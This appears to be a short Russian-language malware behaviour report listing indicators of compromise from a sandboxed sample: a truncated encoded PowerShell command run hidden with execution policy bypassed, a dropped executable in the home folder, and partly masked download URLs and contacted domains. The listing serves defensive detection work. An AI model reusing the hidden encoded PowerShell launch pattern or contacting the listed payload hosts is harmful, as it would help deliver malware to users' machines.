Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABRADMANwAxAF8ANQA3AD0AJwBwADEAMgA3ADIAMwBfACcAOwAkAGIAMAA3ADYAMgAwADQANQAgAD0AIAAnADgANAA2ACcAOwAkAGsAOAA4ADMAOAAzADAANwA9ACcAYwA4ADY...
- %HOMEPATH%\846.exe
- %HOMEPATH%\846.exe
- 'qu####aobanghieu.vn':80
- 'qu####aobanghieu.vn':443
- 'en###tech.pt':80
- 'me###s.bolt.hu':80
- 'ho###ng.unas.hu':80
- 'ho####g21.unas.hu':443
- 'mi####hthare.co.uk':443
- http://qu####aobanghieu.vn/wp-admin/mnxcr_prcplofs-543418/
- http://en###tech.pt/ftp_sat/pfd770s9cd_tv21zy-3/
- http://me###s.bolt.hu/zscf/ZnHNjKBqK/
- http://ho###ng.unas.hu/error.php?er#########################
- 'qu####aobanghieu.vn':443
- 'ho####g21.unas.hu':443
- 'mi####hthare.co.uk':443
- DNS ASK ta###quila.com
- DNS ASK qu####aobanghieu.vn
- DNS ASK en###tech.pt
- DNS ASK me###s.bolt.hu
- DNS ASK ho###ng.unas.hu
- DNS ASK ho####g21.unas.hu
- DNS ASK mi####hthare.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABRADMANwAxAF8ANQA3AD0AJwBwADEAMgA3ADIAMwBfACcAOwAkAGIAMAA3ADYAMgAwADQANQAgAD0AIAAnADgANAA2ACcAOwAkAGsAOAA4ADMAOAAzADAANwA9ACcAYwA4ADY...' (со скрытым окном)